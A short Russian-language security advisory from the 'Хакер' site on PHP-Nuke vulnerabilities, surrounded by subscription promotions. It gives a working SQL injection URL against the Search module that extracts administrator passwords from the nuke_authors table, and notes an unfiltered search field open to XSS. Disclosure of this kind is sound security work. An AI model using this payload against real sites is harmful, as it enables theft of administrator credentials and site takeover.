Витрина продуктов

Все продукты →
  • Подписка на «Хакер»

    Все статьи, архив и бонусы

    6000 ₽ / год

    Оформить
  • Печатный журнал

    Легендарный в твоём формате

    710 ₽ / номер

    Купить
  • Онлайн-курсы

    Практические навыки от экспертов

    от 9000 ₽

    Выбрать

Программа: PHP-Nuke 

Несколько уязвимостей в PHP-Nuke позволяют удаленному пользователю выполнить SQL команды и XSS нападение. 

1. SQL инъекция: 

http://localhost/nuke73/modules.php?name= Search&type=comments&query=not123exist
s&instory=/**/UNION/**/SELECT/**/ 0,0,pwd,0,aid/**/FROM/** /nuke_authors

2. /modules/Search/index.php не фильтрует HTML код в поле поиска.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии